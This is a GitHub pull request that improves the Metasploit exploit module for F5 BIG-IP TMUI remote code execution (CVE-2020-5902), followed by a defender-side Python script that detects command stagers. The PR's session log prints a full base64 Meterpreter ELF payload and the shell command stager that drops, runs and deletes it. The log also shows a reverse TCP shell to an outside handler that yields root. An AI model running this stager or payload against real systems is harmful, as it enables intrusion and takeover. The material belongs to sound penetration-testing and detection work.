
Improve robustness of exploit/linux/http/f5_bigip_tmui_rce (CVE-2020-5902) #13854

Merged
merged 3 commits into from
Jul 20, 2020

Conversation

wvu
Contributor

@wvu wvu commented Jul 17, 2020

Here are some improvements that didn't make the deadline.

What's strange is that if the stars align, like if the system has been "used" enough, the exploit is incredibly reliable. Maybe my test environment is bonkers. In any case, I'm dropping the rank for the worst case.

msf5 exploit(linux/http/f5_bigip_tmui_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[-] Alias "list" already exists, deleting it
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'"]
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'
[*] Uploading /tmp/WuyGIfbP
[+] Successfully uploaded /tmp/WuyGIfbP
[*] Executing /tmp/WuyGIfbP
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 172.16.249.179
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.179:55118) at 2020-07-17 06:06:38 -0500
[+] Deleted /tmp/WuyGIfbP
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash

meterpreter > getuid
Server username: no-user @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.3.1611 (Linux 3.10.0-514.26.2.el7.ve.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Updates #13807.
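
As an added defender-side example (not code from the PR or the Metasploit module): a small Python check that flags the echo-to-file, decode, chmod +x, run, rm -f command-stager pattern in a captured command line and verifies that the echoed base64 blob decodes to an ELF. The sample lines are constructed, modelled on the session output above with the payload cut down to its header.

```python
import base64
import re

# Constructed sample command lines for the demo. The first is modelled on the
# command stager visible in the PR's session output, with the base64 payload cut
# down to its first 32 characters (the ELF header); the second is benign.
SAMPLE_COMMANDS = [
    "echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA>>'/tmp/wCkkU.b64' ; "
    "((which base64 >&2 && base64 -d -) || (which openssl >&2 && "
    "openssl enc -d -A -base64 -in /dev/stdin)) 2> /dev/null > '/tmp/whuIi' "
    "< '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; "
    "rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'",
    "ls -la /var/log",
]

# Pieces of the stager that are stable across runs (the file names are random).
ECHO_B64 = re.compile(r"echo -n ([A-Za-z0-9+/=]+)\s*>>\s*'([^']+)'")
DECODERS = ("base64 -d", "base64 --decode", "openssl enc -d",
            "standard_b64decode", "decode_base64")
CHMOD_EXEC = re.compile(r"chmod \+x '([^']+)'")


def analyze_command(cmd):
    """Return indicators of the echo/decode/chmod/run/rm stager pattern."""
    result = {"is_stager": False, "drops_elf": False, "exec_path": None,
              "cleans_up": False,
              "decoders": [d for d in DECODERS if d in cmd]}
    echo = ECHO_B64.search(cmd)
    chmod = CHMOD_EXEC.search(cmd)
    if echo:
        try:
            blob = base64.b64decode(echo.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            blob = b""
        # A dropped ELF binary starts with the magic bytes 0x7f 'E' 'L' 'F'.
        result["drops_elf"] = blob.startswith(b"\x7fELF")
    if chmod:
        result["exec_path"] = chmod.group(1)
        # The stager deletes the file it just executed.
        result["cleans_up"] = f"rm -f '{chmod.group(1)}'" in cmd
    result["is_stager"] = bool(echo and chmod and result["decoders"])
    return result


if __name__ == "__main__":
    for line in SAMPLE_COMMANDS:
        print(analyze_command(line))
```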

tmshCmd.jsp is extremely unreliable!
wvu added 2 commits July 17, 2020 06:10
What's strange is that if the stars align, like if the system has been
"used" enough, the exploit is incredibly reliable. Maybe my test
environment is bonkers.
@wvu wvu requested a review from smcintyre-r7 July 17, 2020 11:49
@wvu wvu removed the request for review from smcintyre-r7 July 20, 2020 15:11
@wvu wvu self-assigned this Jul 20, 2020
@wvu wvu merged commit 6211fea into rapid7:master Jul 20, 2020
@wvu
Contributor Author

wvu commented Jul 20, 2020

Release Notes

Improved the robustness of the exploit/linux/http/f5_bigip_tmui_rce module (CVE-2020-5902) and set Meterpreter as the default payload type.

@wvu wvu deleted the feature/f5 branch July 20, 2020 15:23
@pbarry-r7 pbarry-r7 added the rn-enhancement release notes enhancement label Aug 5, 2020